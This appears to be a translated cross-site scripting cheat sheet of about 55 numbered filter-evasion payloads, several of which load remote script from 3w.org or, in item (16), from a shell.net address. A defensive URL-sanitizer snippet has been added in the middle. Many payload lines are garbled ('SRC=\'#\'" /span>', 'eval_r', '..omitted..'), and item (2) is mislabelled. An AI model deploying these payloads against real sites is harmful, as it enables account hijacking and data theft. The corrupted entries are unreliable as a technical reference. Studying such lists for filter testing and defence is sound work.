(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective on sites in China, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">
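The obfuscations in (3) to (19), and the javascript: URLs placed in attributes and CSS url() values further down, all aim at the same weak spot: a filter that inspects the raw attribute value instead of the value the browser will actually act on. As an added defender-side example (not part of the original cheat sheet), the check below normalises a URL-valued attribute the way a browser does and then applies a scheme allowlist; the small named-entity table is an assumption standing in for a full HTML entity decoder.

```javascript
// Added defensive example, not from the original cheat sheet. isSafeUrl() decides
// whether a URL-valued attribute (SRC, HREF, BACKGROUND, CSS url(...)) may be kept,
// after normalising it as a browser would: mixed case (4), character references with
// or without semicolons (5, 8, 9, 10), embedded tab/newline/CR (11-15, 19) and null
// bytes (17, 18) are all folded away before the scheme is compared to an allowlist.

// Assumption: this small named-entity table is enough for the check shown here;
// a production sanitizer needs a complete HTML entity decoder.
const NAMED_ENTITIES = { tab: "\t", newline: "\n", colon: ":", amp: "&", lt: "<", gt: ">", quot: '"' };

// Decode &#NNN; / &#xHH; / &name; character references. The trailing semicolon is
// optional, exactly as browsers accept it and as payloads (9) and (10) rely on.
function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    const v = NAMED_ENTITIES[name.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// Normalise like the URL parser: strip leading/trailing C0 controls and spaces, then
// drop ASCII tab, LF and CR anywhere. Null bytes are dropped as well, because older
// engines ignored them inside the scheme (payloads 17 and 18).
function normalizeUrl(value) {
  const trimmed = decodeEntities(value).replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  return trimmed.replace(/[\t\n\r\x00]/g, "");
}

// The scheme is the run of [a-z0-9+.-] (starting with a letter) before the first
// colon, compared case-insensitively. Returns null for scheme-less (relative) URLs.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist, never a blocklist: relative and http(s) URLs pass, everything else
// (javascript:, vbscript:, data:, ...) is rejected. A protocol-relative "//host/x"
// has no scheme and therefore passes; it resolves to http(s) at load time.
const ALLOWED_SCHEMES = new Set(["http", "https"]);

function isSafeUrl(value) {
  const scheme = schemeOf(normalizeUrl(value));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}
```

The same normalisation applies to url() values inside STYLE attributes and stylesheets, which is why a blocklist on the literal string "javascript:" fails against (39), (46), (51) and (53) as well.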

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>